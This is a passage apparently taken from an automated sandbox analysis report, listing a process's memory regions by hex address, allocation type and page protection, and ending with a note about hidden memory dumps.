page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
2165A3B5000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE5770B000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
46AD000
|
stack
|
page read and write
|
||
|
232C0000
|
trusted library allocation
|
page read and write
|
||
|
21C51000
|
trusted library allocation
|
page read and write
|
||
|
5103000
|
heap
|
page read and write
|
||
|
515A000
|
heap
|
page read and write
|
||
|
2EB6000
|
trusted library allocation
|
page execute and read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
5380000
|
direct allocation
|
page read and write
|
||
|
21672140000
|
heap
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
22D06000
|
heap
|
page read and write
|
||
|
2165B6D8000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
474B000
|
stack
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
2FDE000
|
stack
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
896E000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2165A700000
|
trusted library allocation
|
page read and write
|
||
|
2C3E000
|
stack
|
page read and write
|
||
|
2EC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
21659C7D000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
7FFE57940000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
4618000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165A48E000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page execute and read and write
|
||
|
232C0000
|
trusted library allocation
|
page read and write
|
||
|
2E28000
|
heap
|
page read and write
|
||
|
1BF8001B000
|
heap
|
page read and write
|
||
|
94D4F7E000
|
stack
|
page read and write
|
||
|
4D1E000
|
stack
|
page read and write
|
||
|
208AF000
|
stack
|
page read and write
|
||
|
873B000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22C90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
22E42000
|
trusted library allocation
|
page read and write
|
||
|
2165B613000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
23300000
|
trusted library allocation
|
page read and write
|
||
|
21672154000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
8AF0000
|
direct allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
21659DF0000
|
heap
|
page execute and read and write
|
||
|
45CE000
|
stack
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
7FFE579D0000
|
trusted library allocation
|
page read and write
|
||
|
854E000
|
stack
|
page read and write
|
||
|
4560000
|
trusted library allocation
|
page read and write
|
||
|
176067C000
|
stack
|
page read and write
|
||
|
21658330000
|
heap
|
page readonly
|
||
|
7FFE579E0000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
232D0000
|
trusted library allocation
|
page read and write
|
||
|
2A58000
|
heap
|
page read and write
|
||
|
50C4000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
23310000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
8A50000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
4828000
|
trusted library allocation
|
page read and write
|
||
|
22D2B000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
858E000
|
stack
|
page read and write
|
||
|
7FFE578D2000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
4A1E000
|
stack
|
page read and write
|
||
|
25E77084000
|
heap
|
page read and write
|
||
|
7FFE57A20000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
2D1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
5350000
|
direct allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22DC0000
|
trusted library allocation
|
page read and write
|
||
|
2EC0000
|
trusted library allocation
|
page read and write
|
||
|
22D2A000
|
heap
|
page read and write
|
||
|
8B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
22E00000
|
direct allocation
|
page read and write
|
||
|
21658374000
|
trusted library allocation
|
page read and write
|
||
|
702F000
|
stack
|
page read and write
|
||
|
22D08000
|
heap
|
page read and write
|
||
|
2165A46E000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2165A6AD000
|
trusted library allocation
|
page read and write
|
||
|
771C000
|
stack
|
page read and write
|
||
|
1BF8000B000
|
heap
|
page read and write
|
||
|
7FD000
|
unkown
|
page readonly
|
||
|
6C8B000
|
stack
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
4D5F000
|
stack
|
page read and write
|
||
|
72FC000
|
stack
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
50EF000
|
heap
|
page read and write
|
||
|
22E60000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
5102000
|
heap
|
page read and write
|
||
|
1BF80001000
|
heap
|
page read and write
|
||
|
7FFE577AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
20B4E000
|
stack
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
7B6B000
|
stack
|
page read and write
|
||
|
7FFE57900000
|
trusted library allocation
|
page read and write
|
||
|
4542000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2321E000
|
stack
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
23340000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
4540000
|
trusted library allocation
|
page read and write
|
||
|
4BDE000
|
stack
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
216725E0000
|
heap
|
page read and write
|
||
|
22E50000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
21659E01000
|
trusted library allocation
|
page read and write
|
||
|
4DDB000
|
trusted library allocation
|
page read and write
|
||
|
2DC7000
|
heap
|
page read and write
|
||
|
70F3000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
21658090000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
21657F00000
|
heap
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
1BF8000F000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
232C1000
|
trusted library allocation
|
page read and write
|
||
|
21672504000
|
heap
|
page read and write
|
||
|
2165A2B4000
|
trusted library allocation
|
page read and write
|
||
|
50D1000
|
heap
|
page read and write
|
||
|
22E4D000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2166A0F7000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
21658181000
|
heap
|
page read and write
|
||
|
2CB0000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
21672441000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
2165A478000
|
trusted library allocation
|
page read and write
|
||
|
209A0000
|
remote allocation
|
page read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
4EEF000
|
stack
|
page read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
6B7E000
|
stack
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
709A000
|
heap
|
page read and write
|
||
|
22E41000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
23020000
|
heap
|
page read and write
|
||
|
216721EB000
|
heap
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
20B68000
|
trusted library allocation
|
page read and write
|
||
|
2B5E000
|
stack
|
page read and write
|
||
|
94D4BCD000
|
stack
|
page read and write
|
||
|
2165B34E000
|
trusted library allocation
|
page read and write
|
||
|
775D000
|
stack
|
page read and write
|
||
|
2165A2CD000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2CF9000
|
trusted library allocation
|
page read and write
|
||
|
22DF0000
|
direct allocation
|
page read and write
|
||
|
5370000
|
direct allocation
|
page read and write
|
||
|
7FFE577B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21672270000
|
heap
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
21669E6E000
|
trusted library allocation
|
page read and write
|
||
|
2165A334000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
2165A6E8000
|
trusted library allocation
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
781C000
|
stack
|
page read and write
|
||
|
22E41000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
22DC0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCA000
|
heap
|
page read and write
|
||
|
209A0000
|
remote allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
216724F0000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
2165B350000
|
trusted library allocation
|
page read and write
|
||
|
21658300000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
20A8A000
|
stack
|
page read and write
|
||
|
472A000
|
trusted library allocation
|
page read and write
|
||
|
7E5000
|
unkown
|
page readonly
|
||
|
4580000
|
heap
|
page execute and read and write
|
||
|
232F0000
|
trusted library allocation
|
page read and write
|
||
|
21672494000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
8716000
|
heap
|
page read and write
|
||
|
216721E0000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22DF0000
|
heap
|
page execute and read and write
|
||
|
232E0000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBCB000
|
heap
|
page read and write
|
||
|
2CE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6AB0000
|
heap
|
page execute and read and write
|
||
|
2165A338000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
7FFE57A30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE578F0000
|
trusted library allocation
|
page read and write
|
||
|
2B60000
|
trusted library section
|
page read and write
|
||
|
2B22000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
94D4FFC000
|
stack
|
page read and write
|
||
|
21669E01000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
trusted library allocation
|
page read and write
|
||
|
22CFD000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF8001F000
|
heap
|
page read and write
|
||
|
4545000
|
trusted library allocation
|
page execute and read and write
|
||
|
8AC0000
|
direct allocation
|
page read and write
|
||
|
22D29000
|
heap
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
480E000
|
stack
|
page read and write
|
||
|
1BFFDCF8000
|
heap
|
page read and write
|
||
|
2A62000
|
heap
|
page read and write
|
||
|
53B0000
|
direct allocation
|
page read and write
|
||
|
7FFE578AA000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
A6E55FF000
|
stack
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
7FD000
|
unkown
|
page readonly
|
||
|
2165A45C000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
7FFE57930000
|
trusted library allocation
|
page read and write
|
||
|
7FFE578E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
45D0000
|
heap
|
page read and write
|
||
|
2165A468000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
unkown
|
page readonly
|
||
|
2EB0000
|
trusted library allocation
|
page read and write
|
||
|
2E08000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
7DF4EAAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE57910000
|
trusted library allocation
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE576F2000
|
trusted library allocation
|
page read and write
|
||
|
2165CC38000
|
trusted library allocation
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
22D73000
|
heap
|
page read and write
|
||
|
22E3C000
|
stack
|
page read and write
|
||
|
231DD000
|
stack
|
page read and write
|
||
|
7121000
|
heap
|
page read and write
|
||
|
7E7000
|
unkown
|
page readonly
|
||
|
8970000
|
trusted library allocation
|
page read and write
|
||
|
20B0E000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
216583C0000
|
heap
|
page read and write
|
||
|
7FFE57990000
|
trusted library allocation
|
page read and write
|
||
|
21672446000
|
heap
|
page read and write
|
||
|
5151000
|
heap
|
page read and write
|
||
|
892D000
|
stack
|
page read and write
|
||
|
22CD0000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE57980000
|
trusted library allocation
|
page read and write
|
||
|
460E000
|
stack
|
page read and write
|
||
|
22D61000
|
heap
|
page read and write
|
||
|
22D58000
|
heap
|
page read and write
|
||
|
2165A028000
|
trusted library allocation
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
1BFFDBC0000
|
heap
|
page read and write
|
||
|
292E000
|
stack
|
page read and write
|
||
|
1BFFDBD7000
|
heap
|
page read and write
|
||
|
176077E000
|
stack
|
page read and write
|
||
|
94D668C000
|
stack
|
page read and write
|
||
|
6A6E000
|
stack
|
page read and write
|
||
|
79DE000
|
stack
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
4D3C000
|
stack
|
page read and write
|
||
|
79E000
|
stack
|
page read and write
|
||
|
232B0000
|
trusted library allocation
|
page read and write
|
||
|
21658320000
|
trusted library allocation
|
page read and write
|
||
|
6AB5000
|
heap
|
page execute and read and write
|
||
|
1BFFDC08000
|
heap
|
page read and write
|
||
|
2F55000
|
heap
|
page read and write
|
||
|
1BFFDC1A000
|
heap
|
page read and write
|
||
|
8AD0000
|
direct allocation
|
page read and write
|
||
|
4CFF000
|
stack
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
1BF80026000
|
heap
|
page read and write
|
||
|
216583C5000
|
heap
|
page read and write
|
||
|
2165A46A000
|
trusted library allocation
|
page read and write
|
||
|
22D56000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
86E0000
|
heap
|
page read and write
|
||
|
94D563B000
|
stack
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
1BF80211000
|
heap
|
page read and write
|
||
|
216724F7000
|
heap
|
page read and write
|
||
|
4540000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
||
|
22CC6000
|
heap
|
page read and write
|
||
|
22E40000
|
trusted library allocation
|
page read and write
|
There are 1009 hidden memdumps, click here to show them.